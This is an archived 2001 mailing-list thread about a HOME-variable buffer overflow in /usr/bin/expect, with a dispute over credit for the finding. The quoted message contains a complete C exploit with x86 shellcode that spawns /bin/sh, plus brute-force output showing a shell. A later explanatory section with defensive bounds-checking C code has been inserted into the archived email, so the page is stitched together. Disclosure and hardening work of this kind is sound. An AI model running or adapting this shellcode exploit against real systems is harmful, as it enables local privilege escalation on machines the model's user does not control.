Can you refer me to the post from George which documents this? If you are referring to

  $HOME buffer overflow in SunOS 5.8 x86
  Description: There is a buffer overflow in SunOS 5.8 x86 with $HOME and /usr/bin/mail leading to egid=mail.

If so I hardly see how I should give George credit based on only the fact that they share a common variable (HOME) which happens to be unchecked... George and I may be using a similar technique to find the overflow within these applications but I don't see how they are related.

On a side note I forgot to mention that Expect is SUID on Cray.

-KF

"Kevin J. Menard, Jr." wrote:
>
> Hey KF,
>
> This is pretty much the same thing George Guninski reported to BugTraq. You
> should give people proper credit where due.
>
> --
> Kevin
>
> Tuesday, June 05, 2001, 5:04:23 AM, you wrote:
>
> K> I have found an overflow in and coded the exploit code for several
> K> versions of /usr/bin/expect... on SCO, linux, and BSD variants. I am
> K> unable to think of a situation where this would be useful due to the
> K> fact that expect is not suid... can anyone help me determine if this is
> K> exploitable to obtain root? Perhaps a suid expect script could be
> K> exploited? or maybe something like suid kppp which calls expect as a
> K> helper program?
>
> K> [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
> K> [root@linux elguapo]# expect
> K> Segmentation fault (core dumped)
>
> K> -Kevin Finisterre
> K> dotslashat_private
> K> --------------54785D81E19EEAA4D65A5A40
> K> Content-Transfer-Encoding: 7bit
> K> Content-Type: text/plain; charset=us-ascii;
> K> name="expect.c"
> K> Content-Disposition: inline;
> K> filename="expect.c"
>
> K> //krfinisterreat_private or dotslashat_private
> K> //this is output from my brute script...
> K> //722
> K> //Stack pointer: 0xbffffa18
> K> // Offset: 0x2d3
> K> // Return addr: 0xbffff745
> K> //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped)
> K> $3
> K> $L
> K> //723
> K> //Stack pointer: 0xbffffa18
> K> // Offset: 0x2d4
> K> // Return addr: 0xbffff744
> K> //sh-2.04#
> K> //note that I was root when I ran this ... expect is not suid
>
> K> #define BUFFERSIZE 533
>
> K> unsigned long sp(void)
> K> {
> K>     __asm__("movl %esp, %eax");
> K> }
>
> K> int main(int argc,char **argv)
> K> {
> K>     char hell[] =
> K>         "\x29\xc0"
> K>         "\x29\xc0"
> K>         "\xb0\x47"
> K>         "\x29\xdb"
> K>         "\xb3\x0c"
> K>         "\x89\xd9"
> K>         "\xcd\x80"
> K>         "\x5e"
> K>         "\x29\xc0"
> K>         "\x88\x46\x07"
> K>         "\x89\x46\x0c"
> K>         "\x89\x76\x08"
> K>         "\xb0\x0b"
> K>         "\x87\xf3"
> K>         "\x8d\x4b\x08"
> K>         "\x8d\x53\x0c"
> K>         "\xcd\x80"
> K>         "\xe8\xe3\xff\xff\xff"
> K>         "\x2f\x62\x69\x6e\x2f\x73\x68";
> K>     int i;
> K>     int offset;
> K>     long esp;
> K>     long ret;
> K>     long *addr_ptr;
> K>     char *buffer, *ptr;
> K>     offset = atoi(argv[1]);
> K>     esp = sp();
> K>     ret = esp-offset;
>
> K>     if(!(buffer = malloc(BUFFERSIZE)))
> K>     {
> K>         printf("oops\n");
> K>         exit(-1);
> K>     }
>
> K>     ptr = buffer;
> K>     addr_ptr = (long *)ptr;
> K>     for (i=0; i<BUFFERSIZE; i+=4)
> K>         *(addr_ptr++) = ret;
>
> K>     for (i=0; i<BUFFERSIZE/2; i++)
> K>         buffer[i] = '\xeb02';
>
> K>     ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
> K>     for(i=0; i<strlen(hell); i++)
> K>         *(ptr++) = hell[i];
>
> K>     buffer[BUFFERSIZE-1] = 0;
>
> K>     setenv("HOME", buffer, 1);
> K>     execlp("/usr/bin/expect", 0);
> K> }
>
> K> --------------54785D81E19EEAA4D65A5A40--
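The defect behind both the expect and the /usr/bin/mail reports in this thread is the same one: an environment variable (HOME) is copied into a fixed-size buffer with no length check, and whoever launches the program controls that variable. The following is an added example, not code from the thread and not Expect's or mail's own source, showing the check a maintainer would want in that code path: a function that reports whether an unchecked copy would exceed a fixed buffer, and a bounded builder that refuses oversize input instead of overflowing or silently truncating. The 256-byte buffer, the `.rc` suffix and the 433-byte sample HOME (the length used in the original report) are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed-size stack buffer a program might use to build "$HOME/<suffix>".
 * Constructed size for this example. */
#define PATH_CAP 256

/* Reports whether an unchecked strcpy/strcat of `home` plus "/" plus
 * `suffix` into a PATH_CAP buffer would write past its end. Only the
 * arithmetic is performed, never the copy, so this runs safely.
 * Returns 1 if it would overflow, 0 otherwise. */
int would_overflow(const char *home, const char *suffix)
{
    if (home == NULL || suffix == NULL)
        return 0;
    /* strlen(home) + '/' + strlen(suffix) + terminating NUL must fit */
    return strlen(home) + 1 + strlen(suffix) + 1 > PATH_CAP;
}

/* Hardened version: build the path with a bounded write and treat
 * truncation as an error rather than continuing with a mangled path.
 * Returns 0 on success, -1 if HOME is unset/empty or the result would
 * not fit in `cap` bytes (out is left as an empty string in that case). */
int build_rc_path(const char *home, const char *suffix, char *out, size_t cap)
{
    if (home == NULL || *home == '\0' || suffix == NULL || out == NULL || cap == 0)
        return -1;
    int n = snprintf(out, cap, "%s/%s", home, suffix);
    if (n < 0 || (size_t)n >= cap) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed sample input: a HOME value of `len` 'A' characters,
 * mirroring the 433-byte value from the original report. Caller frees. */
char *make_long_home(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    char path[PATH_CAP];
    const char *normal = "/home/user";
    char *oversized = make_long_home(433);
    if (oversized == NULL)
        return 1;

    printf("normal HOME would overflow:   %d\n", would_overflow(normal, ".rc"));
    printf("433-byte HOME would overflow: %d\n", would_overflow(oversized, ".rc"));

    printf("bounded build (normal):   %d -> \"%s\"\n",
           build_rc_path(normal, ".rc", path, sizeof path), path);
    printf("bounded build (433-byte): %d\n",
           build_rc_path(oversized, ".rc", path, sizeof path));

    /* In a real program the value comes from the environment. For a SUID
     * binary (or a SUID program that execs this one as a helper) that
     * value is attacker-chosen, so the length check is the only thing
     * between it and the stack frame. */
    const char *env_home = getenv("HOME");
    if (env_home != NULL && would_overflow(env_home, ".rc"))
        fprintf(stderr, "HOME too long; ignoring it\n");

    free(oversized);
    return 0;
}
```

The point the thread circles around (whether a non-SUID expect makes this matter) is answered by the check, not by the file mode: the same source is SUID on Cray, and any SUID caller that execs expect hands it the caller's HOME, so the copy has to be bounded wherever it runs.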
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 23:25:21 PDT